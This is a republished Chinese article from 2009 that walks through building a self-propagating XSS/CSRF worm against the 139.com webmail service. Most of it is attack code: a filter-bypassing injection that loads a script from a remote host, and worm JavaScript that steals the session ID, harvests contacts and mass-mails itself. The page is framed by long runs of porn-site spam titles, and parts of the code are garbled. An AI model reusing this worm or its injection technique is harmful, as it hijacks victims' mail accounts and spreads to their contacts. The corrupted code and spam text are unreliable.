国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

139郵箱蠕蟲編寫實例

安全 應用安全
我們經常會用到的mail.139.com,由于對郵件正文過濾不嚴,導致存在xss漏洞。他們盡管實現了對style="xss:expression"進行過濾,但是可以通過添加/* */繞過,如:。在添加/* */后,該腳本能夠在IE瀏覽器執行

139郵箱蠕蟲編寫實例

Author:[sh0wrun],[woyigui]

Date:2009-09-09

聲明:該漏洞已報告并已修復,切勿用于非法目的。

原理分析: 

我們經常會用到的mail.139.com,由于對郵件正文過濾不嚴,導致存在xss漏洞。他們盡管實現了對style="xss:expression"進行過濾,但是可以通過添加/*  */繞過,如:。在添加/* */后,該腳本能夠在IE瀏覽器執行。
同時,經過分析發現,mail.139.com中發送郵件的功能存在CSRF弱點;可以通過Ajax技術獲取發送郵件所需要的mid值。另外郵箱的“通信錄“中的聯系人郵件可以直接通過javascript取出。
滿足了編寫csrf worm的3個條件,接下來的工作,就是通過編寫javascript代碼來實現了。

跨站代碼:

該部分要實現的功能就是,觸發瀏覽器去讀取遠端的js腳本,并且執行該腳本:

Original:

var ig =document.createElement("script");ig.src="http://192.168.9.104/woyigui/139.js";try {document.getElementsByTagName("body")[0].appendChild(ig);} catch (e) {document.documentElement.appendChild(document.createElement("body"));document.getElementsByTagName("body")[0].appendChild(ig);}

對該部分編碼按照10進制進行編碼,以避免關鍵字被替換,并調用:

該部分代碼,需放置在郵件正文中傳送。

腳本功能的實現:

主要實現了如下功能:

1.通過腳本,讀取聯系人的郵箱地址。

該部分信息,可以通過top.LinkManList.concat()獲取。

2.通過腳本,獲取sid值

該部分信息,可以通過window.top.location.href,配合正則表達式獲取到。

3.獲取發送郵件所需要的mid值

在獲取到sid值后,通過script打開"寫郵件"頁面,讀取mid值。

4.發送郵件

發送郵件功能只驗證mid值,因此在獲取到正確的mid值后,連同獲取到的聯系人一起,構造post數據,發送郵件。
5.改寫郵件轉發規則和自動回復規則

在有正確的sid后,構造post。

完整代碼:

var xssed = false; 
if (typeof XSSflag != "undefined"){ 
  xssed = true; 
} 
var XSSflag = [ 
  {name: "version", url: "1.0"}, 
]; 
if ( xssed != true ) {   
  var xmlhttp; 
  //create XHR 
  function createXMLHttp(){   
      try { 
        xmlhttp = new XMLHttpRequest(); 
      } catch (e) { 
         var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0', 
                     'MSXML2.XMLHTTP.4.0', 
                     'MSXML2.XMLHTTP.3.0', 
                     'MSXML2.XMLHTTP', 
                     'Microsoft.XMLHTTP' ); 
        var success = false; 
        for (var i=0;i < XMLHTTP_IDS.length && !success; i++) { 
          try { 
             xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]); 
              success = true; 
          } catch (e) {} 
        } 
        if (!success) { 
          throw new Error('Unable to create XMLHttpRequest.'); 
        } 
     } 
  } 
  function domid (dourl) { 
    createXMLHttp();   
    var tmp = ""; 
    xmlhttp.open("GET", dourl, false);   
    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;"); 
    xmlhttp.setRequestHeader("Connection", "close"); 
    xmlhttp.send(null); 
    setTimeout( tmp = xmlhttp.responseText,500); 
    return tmp;     
  } 
  function startRequest(doUrl, tomail, subject, Content, account, mid, sid ){   
    createXMLHttp();   
    var params = "funcid=compose&sid="+ sid +"&mid="+ mid +"&hidRemoteIp=&ishtml=y&optype=
send.x&idOpType=&text="+ Content +"&destcgi=
&funcid=compose&netfdrhost=&to="+ tomail +"&cc=&bcc=&subject="+ subject +"&year=
&month=&day=&hour=undefined&compinfo_minute=&chkHtmlMessage_text=y&chkHtmlMessage=y&ifsavetosent= 
   xmlhttp.setRequestHeader
("Content-Type","application/x-www-form-urlencoded;"); 
    y&account="+ account +"&destcgi=&netfdrhost=&split_rcpt=n&return_receipt=0&priority=0"; 
    
xmlhttp.open("POST", doUrl, false);   
xmlhttp.setRequestHeader("Content-length", params.length); 
    xmlhttp.setRequestHeader("Connection", "close"); 
    xmlhttp.send(params); 
  } 
  function doMyAjax()   
  {   
     var strPer = '/coremail/cgi/attachfapps'; 
     var tomail = ';'; 
     var subject = "test20"; 
     var Content = "";
     var account = ""; 
     var sid = window.top.location.href.replace(/.*&sid=(.*)/,"$1"); 
     var tmpmid = domid("/coremail/fcg/ldmmapp?funcid=compose&sid=" + sid );   
     var mid="",text=""; 
     text=tmpmid.split("\n"); 
    for (var i=0;i < text.length; i++) 
    { 
      var patt=/name=\"mid\" value=\"/; 
      if ( patt.test(text[i])) 
      {   
        mid=text[i].replace(/.*name=\"mid\" value=\"(.*)\".*/, "$1"); 
        break; 
      } 
    } 
    var mail_address=top.LinkManList.concat(); 
    for (var i=0,len=mail_address.length;i;"; 
      } 
    } 
     try { 
       startRequest(strPer, encodeURIComponent(tomail), encodeURIComponent(subject), 
encodeURIComponent(Content), encodeURIComponent(account), mid, sid );     
     } catch (e) { 
       alert("send data error!"); 
     } 
  } 
  doMyAjax(); 
} 

【編輯推薦】

  1. 深入了解網絡中的蠕蟲病毒
  2. Conficker蠕蟲作者可隨時引爆“網絡核武器”
  3. 風暴蠕蟲可能向安全人員實施報復性攻擊
責任編輯:安泉 來源: 黑客防線
相關推薦

2015-07-20 10:27:50

DockerDockerfile創建實例

2020-04-03 10:14:57

內存蠕蟲代碼web安全

2011-04-06 09:39:49

mysql5存儲

2022-01-07 06:12:08

RPC框架限流

2020-03-30 17:43:13

開源開源項目編寫文檔

2011-06-16 17:54:30

Qt Mplayer

2010-09-15 08:52:03

2016-09-02 09:14:26

2009-07-07 11:04:12

百變蠕蟲病毒卡巴斯基

2014-05-14 13:13:59

2011-07-05 17:54:43

QT Sqlite ARM

2017-02-15 08:20:13

2010-12-17 10:07:55

2009-07-07 22:52:21

2017-05-14 21:40:48

2010-10-12 16:14:37

蠕蟲病毒計算機安全

2014-06-20 11:13:11

2019-08-14 08:03:49

LinuxShell腳本web服務

2010-09-27 11:23:53

2011-08-09 10:51:05

點贊
收藏

51CTO技術棧公眾號

中文字幕va一区二区三区| 欧美一区二区视频在线观看2020| 国产精品中文字幕在线| 尤物视频在线免费观看| 国产精品久久久久福利| 国产原创视频在线观看| 亚洲欧美另类久久久精品2019| 亚洲高清在线播放| 欧美丝袜丝交足nylons172| 久久久久久久久97黄色工厂| 狠狠久久综合婷婷不卡| 宅男在线一区| 久久99国产综合精品女同 | 高清免费观看在线| 国产高清不卡一区| 另类欧美小说| 亚洲色图二区| 日韩av电影在线网| 国产精品毛片aⅴ一区二区三区| 精品免费日韩av| 欧美日韩成人在线播放| 55夜色66夜色国产精品视频| 日韩欧美一区二区三区免费观看 | 桥本有菜av在线| 亚洲激情偷拍| 国产精品久久久久久中文字| 欧美r片在线| 午夜精品视频一区二区三区在线看| www日韩欧美| 欧美三级精品| 亚洲韩国欧洲国产日产av| 日本在线观看免费| 欧美日韩国产在线观看| 在线成人福利| 亚洲国产精品视频| 婷婷综合影院| 亚洲3atv精品一区二区三区| 爆操欧美孕妇| 亚洲女性喷水在线观看一区| 成人性做爰aaa片免费看不忠| 成人的网站免费观看| 黄色污污在线观看| 美女一区二区在线观看| 日日噜噜噜夜夜爽亚洲精品 | 精品人妻少妇一区二区| 成人av在线资源网站| 天堂8在线天堂资源bt| 国产另类ts人妖一区二区| 日本中文字幕在线视频观看| 日韩一区二区三区精品| 久久99久久99精品中文字幕| 日韩欧美另类中文字幕| 色综合天天综合网国产成人网| 日韩一级淫片| 国产成人精品综合久久久| 欧美丝袜一区| 国产精品二区三区| 日韩国产欧美视频| 日本黄大片在线观看| 91网站视频在线观看| 国产九九在线观看| 欧美精品偷拍| 欧美伦理一区二区| 国产精品影音先锋| 日本黄大片一区二区三区| 亚洲一区二区三区在线看| 91精彩在线视频| 亚洲乱码av中文一区二区| 伊人久久亚洲| 亚洲一区二区三区香蕉| 精品一区二区三区的国产在线播放| 91丨porny丨探花| 一区二区三区四区视频精品免费| 视频在线不卡| 欧美刺激午夜性久久久久久久| 97欧美成人| 成人h视频在线| 粉嫩91精品久久久久久久99蜜桃 | 日本天堂影院在线视频| 欧美大片在线观看| 精品国产麻豆| 成人av资源| 风流少妇一区二区| x88av蜜桃臀一区二区| 91精品国产欧美一区二区18| 偷拍自拍亚洲| 91天堂在线视频| 国产真实乱对白精彩久久| 九色在线91| 日韩免费视频一区| 国产精品对白| 青青草国产精品| 中文字幕亚洲区| 色呦呦呦在线观看| 欧美一级视频免费在线观看| 午夜一区不卡| 久久久精品麻豆| 欧美一级黄色片| 亚洲人和日本人hd| 青草全福视在线| 色综合久久88色综合天天免费| 精品国产欧美日韩一区二区三区| 成人欧美在线观看| 久久婷婷色综合| 黄网址在线观看| 91av在线看| 久久久久观看| 欧美日韩在线精品一区二区三区| 日本一区二区综合亚洲| 免费在线看黄色片| 在线观看精品一区| 麻豆视频久久| 日本一区二区在线视频观看| 亚洲色图在线播放| 国产理论片免费观看| 日韩av在线免播放器| 日韩成人a**站| 午夜精品久久久内射近拍高清| 色噜噜夜夜夜综合网| 91成人精品在线| wwwjizzjizzcom| 欧美一级专区免费大片| 99久久夜色精品国产亚洲96| 日韩视频免费在线播放| 亚洲精品理论电影| 国产精品婷婷| 传媒视频在线| 97在线视频免费播放| 国产不卡视频一区二区三区| 欧美aaa免费| 国产一区免费| 日韩欧美亚洲成人| 欧美黄色激情| 国产精品美女999| 久久久www免费人成精品| av色在线观看| 亚洲最新中文字幕| 日韩综合一区二区| 91se在线| www.成人av.com| 婷婷开心久久网| 青青草综合网| 天天草夜夜草| 国产精品视频永久免费播放 | 亚洲国产精品黑人久久久| 国产激情视频在线看| 欧美日韩日本网| 777色狠狠一区二区三区| 中文字幕av亚洲精品一部二部| 国产偷激情在线| 国产va免费精品高清在线观看| 国产精品免费视频观看| 国产精品一区二区三区美女| 成人黄色一区二区| 国模精品视频一区二区| 久久精品视频在线看| 精品一区二区三区在线观看视频| 免费无码毛片一区二三区| 最近中文字幕2019免费| 久久综合久久综合久久综合| 成人自拍视频| 亚欧在线免费观看| 久久久人成影片一区二区三区| 国产三级欧美三级| 久久久亚洲欧洲日产| 男女小视频在线观看| 成人免费福利在线| 欧美日韩国产首页| 蜜桃视频一区二区三区| 色香欲www7777综合网| 99色精品视频| 热re99久久精品国产66热| 福利微拍一区二区| 久久av一区| 78精品国产综合久久香蕉| 日韩一级免费片| 亚洲专区在线视频| 亚洲第一页自拍| 97se亚洲国产综合自在线观| 一本色道久久综合亚洲精品酒店| 女人天堂在线| 色狠狠久久av五月综合|| www.久久撸.com| 亚洲综合自拍偷拍| 中日韩男男gay无套| xx欧美视频| 成人网18入口| 亚洲高清一区二| 97精品超碰一区二区三区| 国产探花在线精品| 男人天堂a在线| 97精品国产97久久久久久春色| 亚洲黄色免费网站| 午夜在线视频观看日韩17c| 日韩福利在线观看| 香蕉视频在线观看免费| 欧美日韩精品综合| 欧美国产激情18| 欧美性xxxxx极品少妇| 国产精品自在在线|